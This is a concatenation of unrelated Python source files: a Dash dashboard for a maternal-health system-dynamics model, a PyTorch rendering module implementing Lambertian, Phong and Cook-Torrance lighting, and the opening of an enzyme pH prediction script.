        dbc.Col(html.H5('Meta parameters'), width=3),
        dbc.Col([
            html.Div([
                make_slider(0, 'Time when factor changes will take place', 'P_slider', parameters['t_change'], 0, nt)
            ]),
        ], width=3),
        dbc.Col([
            html.Div([
                make_slider(1, 'Common coefficient for rate of change', 'P_slider', parameters['beta'], 0, 100)
            ]),
        ], width=3),
    ], className="pretty_container"),
])
# S_values_global = np.array(S_0) # used for sensitivities
# F_values_global = np.array(F_0)
def update_colors(F_clicks, F_styles, F_combination_styles):
    """Toggle slider-button highlight colors from their click counts.

    A button with an odd click count is "selected": its own style becomes
    #f50 and the SOME-combination button (index 1) is highlighted too; even
    counts reset a button to black (#000). The style dicts are mutated in
    place and both lists are returned for the Dash callback outputs.

    Idiom fix: pairs clicks with styles via zip instead of a hand-maintained
    index counter.
    """
    F_combination_styles[1]['color'] = '#000' # default color if no F_slider_buttons are selected
    for clicks, style in zip(F_clicks, F_styles):
        if clicks % 2 == 1:
            F_combination_styles[1]['color'] = '#f50'
            style['color'] = '#f50'
        else:
            style['color'] = '#000'
    return F_styles, F_combination_styles
# Callback: re-color the positive-factor slider buttons whenever one is
# clicked (delegates to update_colors).
@app.callback(
    dash.dependencies.Output({'type': 'FP_slider_button', 'index': ALL}, 'style'),
    dash.dependencies.Output({'type': 'FP_combination_slider_button', 'index': ALL}, 'style'),
    [Input({'type': 'FP_slider_button', 'index': ALL}, 'n_clicks'),],
    [State({'type': 'FP_slider_button', 'index': ALL}, 'style'),
     State({'type': 'FP_combination_slider_button', 'index': ALL}, 'style'),],
)
def update_labels(FP_clicks, FP_styles, FP_combination_styles):
    # NOTE(review): a second callback below reuses the name update_labels;
    # Dash registers both at decoration time so this works, but renaming one
    # would avoid the shadowing.
    return update_colors(FP_clicks, FP_styles, FP_combination_styles)
# Callback: same as the FP version but for the negative-factor buttons.
@app.callback(
    dash.dependencies.Output({'type': 'FN_slider_button', 'index': ALL}, 'style'),
    dash.dependencies.Output({'type': 'FN_combination_slider_button', 'index': ALL}, 'style'),
    [Input({'type': 'FN_slider_button', 'index': ALL}, 'n_clicks'),],
    [State({'type': 'FN_slider_button', 'index': ALL}, 'style'),
     State({'type': 'FN_combination_slider_button', 'index': ALL}, 'style'),],
)
def update_labels(FN_clicks, FN_styles, FN_combination_styles):
    # Shadows the FP update_labels above by name; both callbacks remain
    # registered because registration happens at decoration time.
    return update_colors(FN_clicks, FN_styles, FN_combination_styles)
# Callback: when a combination slider moves, push new values to the
# individual factor sliders. Combination slider 0 ("ALL") rescales every
# slider between its default and its max; slider 1 ("SOME") only rescales
# the sliders whose buttons are currently highlighted (non-black).
@app.callback(
    dash.dependencies.Output({'type': 'FP_slider', 'index': ALL}, 'value'), # simple trial
    dash.dependencies.Output({'type': 'FN_slider', 'index': ALL}, 'value'), # simple trial
    [Input({'type': 'FP_combination_slider', 'index': ALL}, 'value'),
     Input({'type': 'FN_combination_slider', 'index': ALL}, 'value'),],
    [State({'type': 'FP_slider', 'index': ALL}, 'value'),
     State({'type': 'FN_slider', 'index': ALL}, 'value'),
     State({'type': 'FP_slider', 'index': ALL}, 'max'),
     State({'type': 'FN_slider', 'index': ALL}, 'max'),
     State({'type': 'FP_slider_button', 'index': ALL}, 'style'),
     State({'type': 'FN_slider_button', 'index': ALL}, 'style')]
)
def update_combination_slider(FP_combination_values, FN_combination_values, FP_values, FN_values,
                              FP_max, FN_max, FP_style, FN_style):
    FP_0,FN_0 = get_factors_0()
    def update_F_values(F_values, F_0, F_max, F_style, F_combination_values):
        # Interpolate each slider between its default (F_0) and max; the
        # "SOME" interpolation overrides only highlighted (non-black) buttons.
        F_values = np.array(F_values)
        F_max = np.array(F_max)
        F_values = F_0 + (F_max - F_0) * F_combination_values[0]
        F_some_values = F_0 + (F_max - F_0) * F_combination_values[1]
        idx = 0
        for style in F_style:
            if (style['color'] != '#000'): # not black
                F_values[idx] = F_some_values[idx]
            idx += 1
        return list(F_values)
    return update_F_values(FP_values, FP_0, FP_max, FP_style, FP_combination_values), \
           update_F_values(FN_values, FN_0, FN_max, FN_style, FN_combination_values)
@app.callback(
    dash.dependencies.Output('plot_1a', 'figure'), # component_id='plot_1a', component_property='figure'
    dash.dependencies.Output('plot_1b', 'figure'),
    dash.dependencies.Output('plot_1c', 'figure'),
    dash.dependencies.Output('plot_2a', 'figure'),
    dash.dependencies.Output('plot_2b', 'figure'),
    dash.dependencies.Output('plot_2c', 'figure'),
    # each row is passed to update_graph (update the dashboard) as a separate argument in the same
    [Input({'type':'S_slider','index':ALL}, 'value'), # get all S-slider values, pass as 1st argument to update_graph()
    Input({'type':'FP_slider','index':ALL}, 'value'),
    Input({'type':'FN_slider','index':ALL}, 'value'),
    Input({'type':'B_slider','index':ALL}, 'value'),
    Input({'type':'C_slider','index':ALL}, 'value'),
    Input({'type':'P_slider','index':ALL}, 'value'),],
    [State({'type':'FP_slider','index':ALL}, 'max'),
    State({'type':'FN_slider','index':ALL}, 'max'),],
)
def update_graph(S_values,FP_values,FN_values,B_values,C_values,P_values,FP_max,FN_max): # each argument is one of Input(...)
    """Recompute the system-dynamics model from all slider values and rebuild
    the six dashboard figures (policy, resources, service readiness, quality,
    deliveries over time, negative birth outcomes).

    Returns the six plotly figure dicts in the order of the Output()
    declarations above.
    """
    # S_values_global = np.array(S_values) # used for sensitivities
    # F_values_global = np.array(F_values)
    # SLIDER VALUES GETS PASSED TO THE MODEL TO COMPUTE THE MODEL RESULTS (e.g., y_t = stocks over time)
    t_all, y_t, num_d, pos_neg_HO = calc_y(S_values,FP_values,FN_values,B_values,C_values,P_values)
    # num_deliver_home, num_deliver_2, num_deliver_4, num_deliver_total, L2_D_Capacity, L4_D_Capacity = num_d
    # Column ranges of y_t that belong to each figure; S_label holds the
    # per-stock legend names.
    k_range_1A = range(0,6)
    k_range_1B = range(6,11)
    k_range_1C = range(11,16)
    k_range_2A = range(16,len(S_label))
    def y_max(k_range, y=y_t, increments=5):
        # Largest value over the selected series, rounded up to a multiple of
        # 1/increments, used as the y-axis upper bound.
        if isinstance(y,list):
            max_y = 0
            for k in k_range:
                max_y = max(max_y, max(y[k]))
        else:
            max_y = np.amax(np.array(y)[:, k_range])
        return np.ceil(increments * max_y) / increments
    fig_1A = {
        'data':[{
            'x': t_all,
            'y': y_t[:,k],
            'name': S_label[k]
        } for k in k_range_1A],
        'layout': {
            'title': 'POLICY',
            'xaxis':{'title':'Time (months)'},
            'yaxis':{'range':[0,y_max(k_range_1A)], 'title':'Stocks (normalized units)'}
        }
    }
    fig_1B = {
        'data':[{
            'x': t_all,
            'y': y_t[:,k],
            'name': S_label[k]
        } for k in k_range_1B],
        'layout': {
            'title': 'RESOURCES',
            'xaxis':{'title':'Time (months)'},
            'yaxis':{'range':[0,y_max(k_range_1B)], 'title':'Stocks (normalized units)'}
        }
    }
    fig_1C = {
        'data':[{
            'x': t_all,
            'y': y_t[:,k],
            'name': S_label[k]
        } for k in k_range_1C],
        'layout': {
            'title': 'SERVICE READINESS',
            'xaxis':{'title':'Time (months)'},
            'yaxis':{'range':[0,y_max(k_range_1C)], 'title':'Stocks (normalized units)'}
        }
    }
    fig_2A = {
        'data':[{
            'x': t_all,
            'y': y_t[:,k],
            'name': S_label[k]
        } for k in k_range_2A],
        'layout': {
            'title': 'QUALITY',
            'xaxis':{'title':'Time (months)'},
            # Quality stocks are normalized, so the axis is fixed to [0, 1].
            'yaxis':{'range':[0,1], 'title':'Stocks (normalized units)'}
        }
    }
    num_deliveries_labels = ['Level 4/5','Level 2/3','Home','Total','Capacity 4/5','Capacity 2/3'] # total is unused
    fig_2B = {
        'data':[{
            'x': t_all,
            'y': num_d[k],
            'name': num_deliveries_labels[k]
        } for k in [0,1,2,4,5]], # skip index 3 (total); plot deliveries and capacities
        'layout': {
            'title': 'Deliveries over time',
            'xaxis':{'title':'Time (months)'},
            'yaxis':{'range':[0,y_max([0,1,2,4,5],num_d)], 'title':'Deliveries'}
        }
    }
    HO_labels = ['Home delivery','L2', 'L4', 'Total']
    # pos_neg_HO[1] holds the negative-outcome series by delivery location.
    fig_2C = {
        'data':[{
            'x': t_all,
            'y': pos_neg_HO[1][:,k],
            'name': HO_labels[k]
        } for k in [2,1,0,3]],
        'layout': {
            'title': 'Negative birth outcomes over time',
            'xaxis':{'title':'Time (months)'},
            'yaxis':{'range':[0,y_max([2,1,0,3],pos_neg_HO[1])], 'title':'Number of dyads'}
        }
    }
    return fig_1A, fig_1B, fig_1C, fig_2A, fig_2B, fig_2C
# SENSITIVITY (NOT NEEDED)
# delta = 0.1
# @app.callback(
# Output({'type':'sensitivity_output','index':MATCH},'children'),
# [ Input({'type':'sensitivity_variable','index':MATCH},'n_clicks') ],
# [ State({'type':'sensitivity_variable','index':MATCH},'id') ]
# )
# def calc_sensitivity(n,id_match):
# i = id_match['index']
# F_values_delta = F_values_global
# F_values_delta[i] = F_values_global[i] + 0.01
# P_values = np.array([ parameters['t_change'], parameters['beta']])
# y_t = calc_y(S_values_global,F_values_global,P_values)
# y_t_delta= calc_y(S_values_global,F_values_delta, P_values)
# Dy = (y_t_delta[-1] - y_t[-1])/delta
# return Dy[0]
# CAN LEAVE IN FOR PYTHONEVERYWHERE
if __name__ == '__main__':
    # app.run_server(debug=True)
    # dev_tools_ui=False hides the in-browser Dash dev-tools pane.
    app.run_server(debug=True,dev_tools_ui=False)
|
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import torch
import torch.nn.functional as F
import math
from .utils import TensorProperties, convert_to_tensors_and_broadcast
def diffuse(normals, color, direction) -> torch.Tensor:
    """
    Lambertian (cosine-law) diffuse shading.

    Args:
        normals: (N, ..., 3) xyz normal vectors.
        color: (1, 3) or (N, 3) RGB color of the diffuse light component.
        direction: (x, y, z) direction of the light.

    Returns:
        colors: (N, ..., 3) tensor with the same shape as ``normals``.

    The normals and the light direction must be expressed in the same
    coordinate frame (e.g. both in view space if points were transformed
    world -> view).

    NOTE: to use with packed vertices (no batch dimension), reindex the
    per-mesh color/direction first so every argument becomes (P, 3):

    .. code-block:: python

        Args:
            normals: (P, 3)
            color: (N, 3)[batch_idx, :] -> (P, 3)
            direction: (N, 3)[batch_idx, :] -> (P, 3)

        Returns:
            colors: (P, 3)

    where batch_idx is of shape (P), e.g. meshes.verts_packed_to_mesh_idx()
    or meshes.faces_packed_to_mesh_idx() depending on whether points refer to
    vertex coordinates or average/interpolated face coordinates.
    """
    # TODO: handle multiple directional lights per batch element.
    # TODO: handle attenuation.
    # Broadcast all three inputs to a common batch dimension.
    normals, color, direction = convert_to_tensors_and_broadcast(
        normals, color, direction, device=normals.device
    )
    # Insert singleton dims so color/direction broadcast across the arbitrary
    # intermediate dims of `normals` (first dim = batch, last dim = 3).
    mid_dims = normals.shape[1:-1]
    bcast_shape = (-1,) + (1,) * len(mid_dims) + (3,)
    if direction.shape != normals.shape:
        direction = direction.view(bcast_shape)
    if color.shape != normals.shape:
        color = color.view(bcast_shape)
    # Interpolated normals may no longer be unit length; renormalize both.
    unit_normals = F.normalize(normals, p=2, dim=-1, eps=1e-6)
    unit_direction = F.normalize(direction, p=2, dim=-1, eps=1e-6)
    # Lambert's cosine law, clamped so back-facing points receive no light.
    cos_incidence = F.relu(torch.sum(unit_normals * unit_direction, dim=-1))
    return color * cos_incidence[..., None]
def specular(
    points, normals, direction, color, camera_position, shininess
) -> torch.Tensor:
    """
    Calculate the specular component of light reflection.
    Args:
        points: (N, ..., 3) xyz coordinates of the points.
        normals: (N, ..., 3) xyz normal vectors for each point.
        color: (N, 3) RGB color of the specular component of the light.
        direction: (N, 3) vector direction of the light.
        camera_position: (N, 3) The xyz position of the camera.
        shininess: (N) The specular exponent of the material.
    Returns:
        colors: (N, ..., 3), same shape as the input points.
    The points, normals, camera_position, and direction should be in the same
    coordinate frame i.e. if the points have been transformed from
    world -> view space then the normals, camera_position, and light direction
    should also be in view space.
    To use with a batch of packed points reindex in the following way.
    .. code-block:: python::
        Args:
            points: (P, 3)
            normals: (P, 3)
            color: (N, 3)[batch_idx] -> (P, 3)
            direction: (N, 3)[batch_idx] -> (P, 3)
            camera_position: (N, 3)[batch_idx] -> (P, 3)
            shininess: (N)[batch_idx] -> (P)
        Returns:
            colors: (P, 3)
    where batch_idx is of shape (P). For meshes batch_idx can be:
    meshes.verts_packed_to_mesh_idx() or meshes.faces_packed_to_mesh_idx().
    """
    # TODO: handle multiple directional lights
    # TODO: attentuate based on inverse squared distance to the light source
    if points.shape != normals.shape:
        msg = "Expected points and normals to have the same shape: got %r, %r"
        raise ValueError(msg % (points.shape, normals.shape))
    # Ensure all inputs have same batch dimension as points.
    # NOTE(review): `normals` is deliberately not broadcast here — it is
    # assumed to already match `points` (validated above); confirm callers
    # never pass a (1, ..., 3) normals tensor with an (N, ..., 3) points.
    matched_tensors = convert_to_tensors_and_broadcast(
        points, color, direction, camera_position, shininess, device=points.device
    )
    _, color, direction, camera_position, shininess = matched_tensors
    # Reshape direction and color so they have all the arbitrary intermediate
    # dimensions as points. Assume first dim = batch dim and last dim = 3.
    points_dims = points.shape[1:-1]
    expand_dims = (-1,) + (1,) * len(points_dims)
    if direction.shape != normals.shape:
        direction = direction.view(expand_dims + (3,))
    if color.shape != normals.shape:
        color = color.view(expand_dims + (3,))
    if camera_position.shape != normals.shape:
        camera_position = camera_position.view(expand_dims + (3,))
    if shininess.shape != normals.shape:
        shininess = shininess.view(expand_dims)
    # Renormalize the normals in case they have been interpolated.
    normals = F.normalize(normals, p=2, dim=-1, eps=1e-6)
    direction = F.normalize(direction, p=2, dim=-1, eps=1e-6)
    cos_angle = torch.sum(normals * direction, dim=-1)
    # No specular highlights if angle is less than 0.
    mask = (cos_angle > 0).to(torch.float32)
    # Phong specular: mirror the light direction about the normal, then raise
    # the clamped cosine between the reflection and the view ray to the
    # shininess exponent.
    view_direction = camera_position - points
    view_direction = F.normalize(view_direction, p=2, dim=-1, eps=1e-6)
    reflect_direction = -direction + 2 * (cos_angle[..., None] * normals)
    # Cosine of the angle between the reflected light ray and the viewer
    alpha = F.relu(torch.sum(view_direction * reflect_direction, dim=-1)) * mask
    return color * torch.pow(alpha, shininess)[..., None]
def specular_cook_torrance(
    points, normals, direction, color, camera_position, F0, roughness
) -> torch.Tensor:
    """
    Calculate the specular component of light reflection with a Cook Torrance BRDF model.
    Args:
        points: (N, ..., 3) xyz coordinates of the points.
        normals: (N, ..., 3) xyz normal vectors for each point.
        color: (N, 3) RGB color of the specular component of the light.
        direction: (N, 3) vector direction of the light.
        camera_position: (N, 3) The xyz position of the camera.
        F0: (N) Fresnel reflection coefficient at normal incidence.
        roughness: (N) roughness coefficienti of the material.
    Returns:
        colors: (N, ..., 3), same shape as the input points.
    The points, normals, camera_position, and direction should be in the same
    coordinate frame i.e. if the points have been transformed from
    world -> view space then the normals, camera_position, and light direction
    should also be in view space.
    To use with a batch of packed points reindex in the following way.
    .. code-block:: python::
        Args:
            points: (P, 3)
            normals: (P, 3)
            color: (N, 3)[batch_idx] -> (P, 3)
            direction: (N, 3)[batch_idx] -> (P, 3)
            camera_position: (N, 3)[batch_idx] -> (P, 3)
            F0: (N)[batch_idx] -> (P)
            roughness: (N)[batch_idx] -> (P)
        Returns:
            colors: (P, 3)
    where batch_idx is of shape (P). For meshes batch_idx can be:
    meshes.verts_packed_to_mesh_idx() or meshes.faces_packed_to_mesh_idx().
    """
    # TODO: handle multiple directional lights
    # TODO: attentuate based on inverse squared distance to the light source
    if points.shape != normals.shape:
        msg = "Expected points and normals to have the same shape: got %r, %r"
        raise ValueError(msg % (points.shape, normals.shape))
    # Ensure all inputs have same batch dimension as points
    matched_tensors = convert_to_tensors_and_broadcast(
        points, color, direction, camera_position, F0, roughness, device=points.device
    )
    _, color, direction, camera_position, F0, roughness = matched_tensors
    # Reshape direction and color so they have all the arbitrary intermediate
    # dimensions as points. Assume first dim = batch dim and last dim = 3.
    points_dims = points.shape[1:-1]
    expand_dims = (-1,) + (1,) * len(points_dims)
    if direction.shape != normals.shape:
        direction = direction.view(expand_dims + (3,))
    if color.shape != normals.shape:
        color = color.view(expand_dims + (3,))
    if camera_position.shape != normals.shape:
        camera_position = camera_position.view(expand_dims + (3,))
    if F0.shape != normals.shape:
        F0 = F0.view(expand_dims)
    if roughness.shape != normals.shape:
        roughness = roughness.view(expand_dims)
    # Compute the Cook-Torrance BRDF model as the product of the Fresnel term,
    # the geometric masking/shadowing term and the Beckmann microfacet
    # distribution.
    # Note that the dot product (normal, light direction) does not appear as it
    # cancels out with the denominator of the beckmann distribution
    fresnels = fresnel_schlick(points, normals, direction, camera_position, F0)
    geometric_factors = geometric_factor(points, normals, direction, camera_position)
    beckmann = beckmann_distribution(points, normals, direction, camera_position, roughness)
    brdf = fresnels * geometric_factors * beckmann
    return color * brdf[..., None]
def fresnel_schlick(
    points, normals, direction, camera_position, F0
) -> torch.Tensor:
    """
    Calculate the fresnel reflection coefficient of light reflection.
    Args:
        points: (N, ..., 3) xyz coordinates of the points.
        normals: (N, ..., 3) xyz normal vectors for each point.
        direction: (N, 3) vector direction of the light.
        camera_position: (N, 3) The xyz position of the camera.
        F0: (N) Fresnel reflection coefficient at normal incidence.
    Returns:
        fresnels: (N, ..., 1), fresnel reflection coefficient per point.
    The points, normals, camera_position, and direction should be in the same
    coordinate frame i.e. if the points have been transformed from
    world -> view space then the normals, camera_position, and light direction
    should also be in view space.
    To use with a batch of packed points reindex in the following way.
    .. code-block:: python::
        Args:
            points: (P, 3)
            normals: (P, 3)
            direction: (N, 3)[batch_idx] -> (P, 3)
            camera_position: (N, 3)[batch_idx] -> (P, 3)
            F0: (N)[batch_idx] -> (P)
        Returns:
            fresnels: (P, 1)
    where batch_idx is of shape (P). For meshes batch_idx can be:
    meshes.verts_packed_to_mesh_idx() or meshes.faces_packed_to_mesh_idx().
    """
    if points.shape != normals.shape:
        msg = "Expected points and normals to have the same shape: got %r, %r"
        raise ValueError(msg % (points.shape, normals.shape))
    # Ensure all inputs have same batch dimension as points.
    # NOTE(review): F0 is NOT included in the broadcast below (unlike the
    # sibling functions); it is only reshaped — confirm callers always pass F0
    # with a matching batch dimension.
    matched_tensors = convert_to_tensors_and_broadcast(
        points, direction, camera_position, device=points.device
    )
    _, direction, camera_position = matched_tensors
    # Reshape direction so it has all the arbitrary intermediate
    # dimensions of points. Assume first dim = batch dim and last dim = 3.
    points_dims = points.shape[1:-1]
    expand_dims = (-1,) + (1,) * len(points_dims)
    if direction.shape != normals.shape:
        direction = direction.view(expand_dims + (3,))
    if camera_position.shape != normals.shape:
        camera_position = camera_position.view(expand_dims + (3,))
    if F0.shape != normals.shape:
        F0 = F0.view(expand_dims)
    # Renormalize the light direction in case it was interpolated.
    direction = F.normalize(direction, p=2, dim=-1, eps=1e-6)
    # Calculate the view direction and half-vector
    view_direction = camera_position - points
    view_direction = F.normalize(view_direction, p=2, dim=-1, eps=1e-6)
    half_vector = view_direction+direction
    half_vector = F.normalize(half_vector, p=2, dim=-1, eps=1e-6)
    # Schlick's approximation: F = F0 + (1 - F0) * (1 - h.v)^5
    h_dot_v = torch.sum(half_vector*view_direction, dim=-1)
    fresnels = F0+(1-F0)*torch.pow(1-h_dot_v, 5)
    return fresnels
def geometric_factor(
    points, normals, direction, camera_position
) -> torch.Tensor:
    """
    Computes the geometric factor of the Cook Torrance BRDF model.
    It accounts for shadowing and masking effects due to V-shaped microfacets.
    Args:
        points: (N, ..., 3) xyz coordinates of the points.
        normals: (N, ..., 3) xyz normal vectors for each point.
        direction: (N, 3) vector direction of the light.
        camera_position: (N, 3) The xyz position of the camera.
    Returns:
        geometric_factors: (N, ..., 1), geometric factor per point.
    The points, normals, camera_position, and direction should be in the same
    coordinate frame i.e. if the points have been transformed from
    world -> view space then the normals, camera_position, and light direction
    should also be in view space.
    To use with a batch of packed points reindex in the following way.
    .. code-block:: python::
        Args:
            points: (P, 3)
            normals: (P, 3)
            direction: (N, 3)[batch_idx] -> (P, 3)
            camera_position: (N, 3)[batch_idx] -> (P, 3)
        Returns:
            geometric_factors: (P, 1)
    where batch_idx is of shape (P). For meshes batch_idx can be:
    meshes.verts_packed_to_mesh_idx() or meshes.faces_packed_to_mesh_idx().
    """
    if points.shape != normals.shape:
        msg = "Expected points and normals to have the same shape: got %r, %r"
        raise ValueError(msg % (points.shape, normals.shape))
    # Ensure all inputs have same batch dimension as points
    matched_tensors = convert_to_tensors_and_broadcast(
        points, direction, camera_position, device=points.device
    )
    _, direction, camera_position = matched_tensors
    # Reshape direction and camera position so they have all the arbitrary
    # intermediate dimensions of points. First dim = batch dim, last dim = 3.
    points_dims = points.shape[1:-1]
    expand_dims = (-1,) + (1,) * len(points_dims)
    if direction.shape != normals.shape:
        direction = direction.view(expand_dims + (3,))
    if camera_position.shape != normals.shape:
        camera_position = camera_position.view(expand_dims + (3,))
    # Renormalize the normals in case they have been interpolated.
    normals = F.normalize(normals, p=2, dim=-1, eps=1e-6)
    direction = F.normalize(direction, p=2, dim=-1, eps=1e-6)
    cos_angle = torch.sum(normals * direction, dim=-1)
    # Zero the contribution where the surface faces away from the light.
    mask = (cos_angle > 0).to(torch.float32)
    # Calculate the view direction and half-vector.
    view_direction = camera_position - points
    view_direction = F.normalize(view_direction, p=2, dim=-1, eps=1e-6)
    half_vector = view_direction + direction
    half_vector = F.normalize(half_vector, p=2, dim=-1, eps=1e-6)
    # Dot products used by the masking/shadowing term. The dot product is
    # commutative, so v.h is identical to h.v; the original computed it twice
    # (h_dot_v and v_dot_h) — compute it once and reuse it.
    h_dot_n = torch.sum(half_vector * normals, dim=-1) * mask
    h_dot_v = torch.sum(half_vector * view_direction, dim=-1) * mask
    v_dot_n = torch.sum(view_direction * normals, dim=-1) * mask
    l_dot_n = torch.sum(direction * normals, dim=-1) * mask
    # G = min(1, 2(h.n)(v.n)/(v.h), 2(h.n)(l.n)/(v.h)); the epsilon guards
    # against division by zero at grazing angles.
    geometric_factors = torch.min(
        torch.ones_like(h_dot_v),
        torch.min(
            2.0 * h_dot_n * v_dot_n / (h_dot_v + 1e-6),
            2.0 * h_dot_n * l_dot_n / (h_dot_v + 1e-6),
        ),
    )
    return geometric_factors
def beckmann_distribution(
    points, normals, direction, camera_position, roughness
) -> torch.Tensor:
    """
    Calculates the beckmann distribution of microfacets.
    Args:
        points: (N, ..., 3) xyz coordinates of the points.
        normals: (N, ..., 3) xyz normal vectors for each point.
        direction: (N, 3) vector direction of the light.
        camera_position: (N, 3) The xyz position of the camera.
        roughness: (N) The roughness exponent of the material (standard deviation of the Beckmann distribution).
    Returns:
        beckmann: (N, ..., 3), same shape as the input points.
    The points, normals, camera_position, and direction should be in the same
    coordinate frame i.e. if the points have been transformed from
    world -> view space then the normals, camera_position, and light direction
    should also be in view space.
    To use with a batch of packed points reindex in the following way.
    .. code-block:: python::
        Args:
            points: (P, 3)
            normals: (P, 3)
            direction: (N, 3)[batch_idx] -> (P, 3)
            camera_position: (N, 3)[batch_idx] -> (P, 3)
            roughness: (N)[batch_idx] -> (P)
        Returns:
            colors: (P, 3)
    where batch_idx is of shape (P). For meshes batch_idx can be:
    meshes.verts_packed_to_mesh_idx() or meshes.faces_packed_to_mesh_idx().
    """
    # TODO: handle multiple directional lights
    # TODO: attentuate based on inverse squared distance to the light source
    if points.shape != normals.shape:
        msg = "Expected points and normals to have the same shape: got %r, %r"
        raise ValueError(msg % (points.shape, normals.shape))
    # Ensure all inputs have same batch dimension as points
    matched_tensors = convert_to_tensors_and_broadcast(
        points, normals, direction, camera_position, roughness, device=points.device
    )
    _, normals, direction, camera_position, roughness = matched_tensors
    # Reshape direction and camera position so they have all the arbitrary
    # intermediate dimensions of points. First dim = batch dim, last dim = 3.
    points_dims = points.shape[1:-1]
    expand_dims = (-1,) + (1,) * len(points_dims)
    if direction.shape != normals.shape:
        direction = direction.view(expand_dims + (3,))
    if camera_position.shape != normals.shape:
        camera_position = camera_position.view(expand_dims + (3,))
    if roughness.shape != normals.shape:
        roughness = roughness.view(expand_dims)
    # Renormalize the normals in case they have been interpolated.
    normals = F.normalize(normals, p=2, dim=-1, eps=1e-6)
    direction = F.normalize(direction, p=2, dim=-1, eps=1e-6)
    cos_angle = torch.sum(normals * direction, dim=-1)
    # No specular highlights if angle is less than 0.
    mask = (cos_angle > 0).to(torch.float32)
    # Calculate the view direction and half-vector.
    view_direction = camera_position - points
    view_direction = F.normalize(view_direction, p=2, dim=-1, eps=1e-6)
    half_vector = view_direction+direction
    half_vector = F.normalize(half_vector, p=2, dim=-1, eps=1e-6)
    # Compute the necessary dot products (masked to front-facing points).
    h_dot_n = torch.sum(half_vector*normals, dim=-1)*mask
    v_dot_n = torch.sum(view_direction*normals, dim=-1)*mask
    # Beckmann distribution: exp(-tan^2(theta_h)/m^2) over a normalization
    # term. NOTE(review): the denominator uses 4*pi*m^2*(v.n) rather than the
    # textbook pi*m^2*(h.n)^4 — presumably folding in other BRDF denominator
    # terms (see the cancellation note in specular_cook_torrance); confirm
    # against the reference derivation. Epsilons guard divisions by zero.
    roughness_var = roughness*roughness
    beckmann = torch.exp(-(1-h_dot_n*h_dot_n)/(h_dot_n*h_dot_n*roughness_var+1e-6))/(roughness_var*4.0*math.pi*v_dot_n+1e-6)
    return beckmann
class DirectionalLights(TensorProperties):
    """A batch of directional lights with ambient/diffuse/specular components.

    All light components share a single direction per batch element (light at
    infinity), unlike PointLights which attenuate by position.
    """
    def __init__(
        self,
        ambient_color=((0.5, 0.5, 0.5),),
        diffuse_color=((0.3, 0.3, 0.3),),
        specular_color=((0.2, 0.2, 0.2),),
        direction=((0, 1, 0),),
        device: str = "cpu",
    ):
        """
        Args:
            ambient_color: RGB color of the ambient component.
            diffuse_color: RGB color of the diffuse component.
            specular_color: RGB color of the specular component.
            direction: (x, y, z) direction vector of the light.
            device: torch.device on which the tensors should be located
        The inputs can each be
            - 3 element tuple/list or list of lists
            - torch tensor of shape (1, 3)
            - torch tensor of shape (N, 3)
        The inputs are broadcast against each other so they all have batch
        dimension N.
        """
        super().__init__(
            device=device,
            ambient_color=ambient_color,
            diffuse_color=diffuse_color,
            specular_color=specular_color,
            direction=direction,
        )
        _validate_light_properties(self)
        if self.direction.shape[-1] != 3:
            msg = "Expected direction to have shape (N, 3); got %r"
            raise ValueError(msg % repr(self.direction.shape))

    def clone(self):
        # Create an empty instance and let TensorProperties.clone copy fields.
        other = DirectionalLights(device=self.device)
        return super().clone(other)

    def diffuse(self, normals, points=None) -> torch.Tensor:
        # NOTE: Points is not used but is kept in the args so that the API is
        # the same for directional and point lights. The call sites should not
        # need to know the light type.
        return diffuse(
            normals=normals, color=self.diffuse_color, direction=self.direction
        )

    def specular(self, normals, points, camera_position, shininess) -> torch.Tensor:
        # Phong specular term using the fixed light direction.
        return specular(
            points=points,
            normals=normals,
            color=self.specular_color,
            direction=self.direction,
            camera_position=camera_position,
            shininess=shininess,
        )

    def specular_cook_torrance(self, normals, points, camera_position, F0, roughness) -> torch.Tensor:
        # BUG FIX: this method previously called the module-level `specular`
        # with F0=/roughness= keyword arguments which that function does not
        # accept (TypeError at runtime). Delegate to the module-level
        # `specular_cook_torrance`, mirroring PointLights.
        return specular_cook_torrance(
            points=points,
            normals=normals,
            color=self.specular_color,
            direction=self.direction,
            camera_position=camera_position,
            F0=F0,
            roughness=roughness,
        )
class PointLights(TensorProperties):
    # A batch of point lights: each light has a position, and the effective
    # light direction at a surface point is (location - point).
    def __init__(
        self,
        ambient_color=((0.5, 0.5, 0.5),),
        diffuse_color=((0.3, 0.3, 0.3),),
        specular_color=((0.2, 0.2, 0.2),),
        location=((0, 1, 0),),
        device: str = "cpu",
    ):
        """
        Args:
            ambient_color: RGB color of the ambient component
            diffuse_color: RGB color of the diffuse component
            specular_color: RGB color of the specular component
            location: xyz position of the light.
            device: torch.device on which the tensors should be located
        The inputs can each be
            - 3 element tuple/list or list of lists
            - torch tensor of shape (1, 3)
            - torch tensor of shape (N, 3)
        The inputs are broadcast against each other so they all have batch
        dimension N.
        """
        super().__init__(
            device=device,
            ambient_color=ambient_color,
            diffuse_color=diffuse_color,
            specular_color=specular_color,
            location=location,
        )
        _validate_light_properties(self)
        if self.location.shape[-1] != 3:
            msg = "Expected location to have shape (N, 3); got %r"
            raise ValueError(msg % repr(self.location.shape))

    def clone(self):
        # Create an empty instance and let TensorProperties.clone copy fields.
        other = PointLights(device=self.device)
        return super().clone(other)

    def diffuse(self, normals, points) -> torch.Tensor:
        # Per-point light direction from the light location to each point.
        direction = self.location - points
        return diffuse(normals=normals, color=self.diffuse_color, direction=direction)

    def specular(self, normals, points, camera_position, shininess) -> torch.Tensor:
        # Phong specular term with the per-point light direction.
        direction = self.location - points
        return specular(
            points=points,
            normals=normals,
            color=self.specular_color,
            direction=direction,
            camera_position=camera_position,
            shininess=shininess,
        )

    def specular_cook_torrance(self, normals, points, camera_position, F0, roughness) -> torch.Tensor:
        # Cook-Torrance specular term with the per-point light direction.
        direction = self.location - points
        return specular_cook_torrance(
            points=points,
            normals=normals,
            direction=direction,
            color=self.specular_color,
            camera_position=camera_position,
            F0=F0,
            roughness=roughness,
        )
def _validate_light_properties(obj):
props = ("ambient_color", "diffuse_color", "specular_color")
for n in props:
t = getattr(obj, n)
if t.shape[-1] != 3:
msg = "Expected %s to have shape (N, 3); got %r"
raise ValueError(msg % (n, t.shape))
|
## imports
from EnzymePh import *
import pandas as pd
import argparse
import string
import numpy as np
import pickle
import joblib
from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor

## argument parser
parser = argparse.ArgumentParser()
parser.add_argument('--input_csv', default='input.csv')
args = parser.parse_args()

## output file
output_file_path = 'predictions.csv'

## Build one descriptor dataframe per descriptor family from the input
## sequences.
